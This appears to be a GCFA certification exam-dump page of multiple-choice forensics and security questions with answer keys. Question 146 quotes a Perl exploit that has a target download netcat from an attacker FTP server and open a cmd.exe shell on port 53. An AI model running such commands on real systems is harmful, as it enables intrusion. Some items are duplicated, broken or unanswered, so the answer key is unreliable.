2023 Correct Practice Tests of GCFA Dumps with Practice Exam
Certification Sample Questions of GCFA Dumps With 100% Exam Passing Guarantee
NEW QUESTION # 135
Which of the following U.S. Federal laws addresses computer crime activities in communication lines, stations, or systems?
- A. 18 U.S.C. 1030
- B. 18 U.S.C. 2510
- C. 18 U.S.C. 1029
- D. 18 U.S.C. 2701
- E. 18 U.S.C. 1362
Answer: E
Explanation:
Section: Volume B
NEW QUESTION # 136
Which of the following hardware devices prevents broadcasts from crossing over subnets?
- A. Bridge
- B. Hub
- C. Modem
- D. Router
Answer: D
Explanation:
Section: Volume B
NEW QUESTION # 137
Based on the case study, to implement more security, which of the following additional technologies should you implement for laptop computers?
(Click the Exhibit button on the toolbar to see the case study.)
Each correct answer represents a complete solution. Choose two.
- A. Two-factor authentication
- B. PAP authentication
- C. Encrypting File System (EFS)
- D. Digital certificates
- E. Encrypted Data Transmissions
Answer: C,D
NEW QUESTION # 138
Which of the following file attributes are not available on a FAT32 partition?
Each correct answer represents a complete solution. Choose two.
- A. Read Only
- B. Compression
- C. Hidden
- D. Encryption
- E. Archive
Answer: B,D
Explanation:
Section: Volume C
NEW QUESTION # 139
Mark works as a Network Administrator for Net Perfect Inc. The company has a Linux-based network. Mark installs a Checkpoint Firewall NGX on a SecurePlatform device. He performs a scheduled backup of his system settings and products configuration. Where are these backup files stored?
Each correct answer represents a complete solution. Choose all that apply.
- A. Locally on the SecurePlatform machine hard drive
- B. TFTP
- C. SCP
- D. On a PC in a file named userC
Answer: A,B,C
NEW QUESTION # 140
Which of the following classes of hackers describes an individual who uses his computer knowledge for breaking security laws, invading privacy, and making information systems insecure?
- A. Security providing organizations
- B. Gray Hat
- C. Black Hat
- D. White Hat
Answer: C
NEW QUESTION # 141
John is a black hat hacker. FBI arrested him while performing some email scams. Under which of the following US laws will john be charged?
- A. 18 U.S.C. 2510
- B. 18 U.S. 1362
- C. 18 U.S.C. 2701
- D. 18 U.S.C. 1030
Answer: D
NEW QUESTION # 142
Adam works as an Incident Handler for Umbrella Inc. He is informed by the senior authorities that the server of the marketing department has been affected by a malicious hacking attack. Supervisors are also claiming that some sensitive data are also stolen. Adam immediately arrived to the server room of the marketing department and identified the event as an incident. He isolated the infected network from the remaining part of the network and started preparing to image the entire system. He captures volatile data, such as running process, ram, and network connections.
Which of the following steps of the incident handling process is being performed by Adam?
- A. Containment
- B. Identification
- C. Recovery
- D. Eradication
Answer: A
NEW QUESTION # 143
Which of the following is the correct order of loading system files into the main memory of the system, when the computer is running on Microsoft's Windows XP operating system?
- A. NTLDR, BOOT.ini, HAL.dll, NTDETECT.com, NTOSKRNL.exe
- B. BOOT.ini, HAL.dll, NTDETECT.com, NTLDR, NTOSKRNL.exe
- C. NTLDR, BOOT.ini, HAL.dll, NTDETECT.com, NTOSKRNL.exe
- D. NTLDR, BOOT.ini, NTDETECT.com, HAL.dll, NTOSKRNL.exe
Answer: D
NEW QUESTION # 144
Which of the following U.S. Federal laws addresses computer crime activities in communication lines, stations, or systems?
- A. 18 U.S.C. 1030
- B. 18 U.S. 2701
- C. 18 U.S.C. 2510
- D. 18 U.S.C. 1029
- E. 18 U.S.C. 1362
Answer: E
NEW QUESTION # 145
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we- are-secure.com. John wants to redirect all TCP port 80 traffic to UDP port 40, so that he can bypass the firewall of the We-are-secure server. Which of the following tools will John use to accomplish his task?
- A. PsList
- B. Cain
- C. Fpipe
- D. PsExec
Answer: C
Explanation:
Section: Volume C
NEW QUESTION # 146
Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl
msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C
\"echo get hacked.
html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print
"Server is downloading ...
\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?
- A. Creates an FTP server with write permissions enabled
- B. Opens up a telnet listener that requires no username or password
- C. Creates a share called "sasfile" on the target system
- D. Opens up a SMTP server that requires no username or password
Answer: B
NEW QUESTION # 147
Which of the following tools can be used by a user to hide his identity?
Each correct answer represents a complete solution. Choose all that apply.
- A. Proxy server
- B. Anonymizer
- C. Rootkit
- D. War dialer
- E. IPchains
Answer: A,B,E
NEW QUESTION # 148
Which of the following tools can be used by a user to hide his identity?
Each correct answer represents a complete solution. Choose all that apply.
- A. Proxy server
- B. Anonymizer
- C. Rootkit
- D. War dialer
- E. IPchains
Answer: A,B,E
Explanation:
Section: Volume A
NEW QUESTION # 149
John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we- are-secure.com. He wants to test the effect of a virus on the We-are-secure server. He injects the virus on the server and, as a result, the server becomes infected with the virus even though an established antivirus program is installed on the server. Which of the following do you think are the reasons why the antivirus installed on the server did not detect the virus injected by John?
Each correct answer represents a complete solution. Choose all that apply.
- A. The mutation engine of the virus is generating a new encrypted code.
- B. John has created a new virus.
- C. The virus, used by John, is not in the database of the antivirus program installed on the server.
- D. John has changed the signature of the virus.
Answer: A,B,C,D
Explanation:
Section: Volume B
NEW QUESTION # 150
Mark works as a security manager for SofTech Inc. He is using a technique for monitoring what the employees are doing with corporate resources. Which of the following techniques is being used by Mark to gather evidence of an ongoing computer crime if a member of the staff is e-mailing company's secrets to an opponent?
- A. Electronic surveillance
- B. Civil investigation
- C. Physical surveillance
- D. Criminal investigation
Answer: A
Explanation:
Section: Volume A
NEW QUESTION # 151
HOTSPOT
Identify the port in the image given below, which can be connected to the hub to extend the number of ports, and up to 127 devices can be connected to it?
Hot Area:
Answer:
Explanation:
NEW QUESTION # 152
Which of the following enables an inventor to legally enforce his right to exclude others from using his invention?
- A. Artistic license
- B. Patent
- C. Phishing
- D. Spam
Answer: B
NEW QUESTION # 153
Which of the following is the process of comparing cryptographic hash functions of system executables and configuration files?
- A. Spoofing
- B. Shoulder surfing
- C. Reconnaissance
- D. File integrity auditing
Answer: D
NEW QUESTION # 154
......
GCFA Sample Practice Exam Questions 2023 Updated Verified: https://interfacett.braindumpquiz.com/GCFA-exam-material.html